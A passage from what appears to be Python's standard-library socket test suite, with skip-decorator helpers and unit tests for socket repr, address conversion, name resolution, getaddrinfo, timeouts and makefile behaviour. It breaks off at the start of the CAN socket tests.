obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
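# Illustrative usage sketch (hypothetical test names): the server half of a
# test is decorated directly, and the client half mirrors the skip via the
# client_skip attribute set above:
#
#     @skipWithClientIf(some_condition, "reason")
#     def testFeature(self): ...
#
#     @testFeature.client_skip
#     def _testFeature(self): ...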
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s.close()
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType', str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if fqhn not in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
self.assertRaises(OSError, socket.gethostbyname, addr)
self.assertRaises(OSError, socket.gethostbyaddr, addr)
for addr in [support.HOST, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOST]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInvalidInterfaceNameIndex(self):
# test nonexistent interface index/name
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
# test with invalid values
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__, 0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
def testNtoHErrors(self):
good_values = [ 1, 2, 3, 1, 2, 3 ]
bad_values = [ -1, -2, -3, -1, -2, -3 ]
for k in good_values:
socket.ntohl(k)
socket.ntohs(k)
socket.htonl(k)
socket.htons(k)
for k in bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htonl, k)
self.assertRaises(OverflowError, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# The services are ordered so that ones with both a tcp and a udp
# entry come first, at least on modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption-breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Set the default timeout to 10, and see if it propagates
socket.setdefaulttimeout(10)
self.assertEqual(socket.getdefaulttimeout(), 10)
s = socket.socket()
self.assertEqual(s.gettimeout(), 10)
s.close()
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:7:8:')
assertInvalid('1:2:3:4:5:6:7:8:0')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it is reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# A new socket should start with SO_REUSEADDR unset (reuse == 0)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.close()
self.assertRaises(OSError, sock.send, b"spam")
def testNewAttributes(self):
# testing .family, .type and .protocol
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
sock.close()
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test the workaround for an OS X platform bug that caused a segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care about here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org', 0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain, 0, socket.AF_UNSPEC, socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
srv.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
@unittest.skipIf(os.name == 'nt', 'Will not work on Windows')
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd because on this path it doesn't actually verify the family and
# type, and simply populates the socket object.
#
# On Windows this trick won't work, so the test is skipped.
fd, _ = tempfile.mkstemp()
with socket.socket(family=42424, type=13331, fileno=fd) as s:
self.assertEqual(s.family, 42424)
self.assertEqual(s.type, 13331)
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
